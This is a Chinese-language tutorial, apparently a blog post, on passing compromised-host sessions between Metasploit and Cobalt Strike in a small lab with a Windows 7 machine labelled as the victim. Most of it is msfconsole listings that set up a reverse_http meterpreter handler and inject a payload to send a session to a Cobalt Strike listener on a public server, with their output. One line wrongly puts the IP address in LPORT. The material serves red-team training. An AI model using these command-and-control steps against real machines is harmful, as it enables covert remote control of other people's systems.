MSF & Cobalt Strike 互派会话
List
- 环境介绍
Cobalt Strike
派会话到Msf
- Msf 派会话到个人服务器的
Cobalt Strike
Tips: 文章内容存在Gif
文件,请网页加载完成后阅读此文。
0x1 环境介绍
1.1 个人服务器
操作系统:Centos 7
。
IP:39.100.233.99 。
说明:挂载 Cobalt Strike
服务端。
1.2 局域网
1.物理机
网络:WIFI
,通外网。
操作系统:Mac OS
。
IP:192.168.2.221 。
说明:挂载 MSF
控制端 和 Cobalt Strike
服务端。
2.虚拟机
网络:桥接 WIFI
,通外网。
操作系统:Windows 7(x64)
。
IP:192.168.2.240 。
说明:受害机。
0x2 Cobalt Strike 派会话到 Msf
2.1 MSF 设置监听
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf5 exploit(multi/handler) > set LHOST 192.168.2.221
LHOST => 192.168.2.221
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > run
2.2 Cobalt Strike 监听器配置
如下在 Mac
物理机运行 Cobalt Strike
服务端和客户端,生成木马使 Windows 7
正常上线。
beacon
为 CS
内置监听器,当我们在目标系统成功执行 payload
以后,会弹回一个 beacon
的 shell
给 CS
。
foreign
主要是提供给外部使用的一些监听器,比如派一个 meterpreter
会话到 MSF
。
增加会话选中新添加的(MSF
)监听器即可。
0x3 Msf 派会话到 Cobalt Strike
在 Cobalt Strike
客户端设置好监听器。
msf5 exploit(windows/local/payload_inject) > use exploit/windows/local/payload_inject
msf5 exploit(windows/local/payload_inject) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf5 exploit(windows/local/payload_inject) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf5 exploit(windows/local/payload_inject) > set LPORT 39.100.233.99
LPORT => 39.100.233.99
msf5 exploit(windows/local/payload_inject) > set LPORT 8081
LPORT => 8081
msf5 exploit(windows/local/payload_inject) > set session 6
SESSION => 6
msf5 exploit(windows/local/payload_inject) > run
[*] Running module against PPBIBO-PC
[-] PID does not actually exist.
[*] Launching notepad.exe...
[*] Preparing 'windows/meterpreter/reverse_http' for PID 3756
成功上线,也可以上线到物理机 Mac
上的 CS
,只要可以通信就可以。
太棒了,又学到了!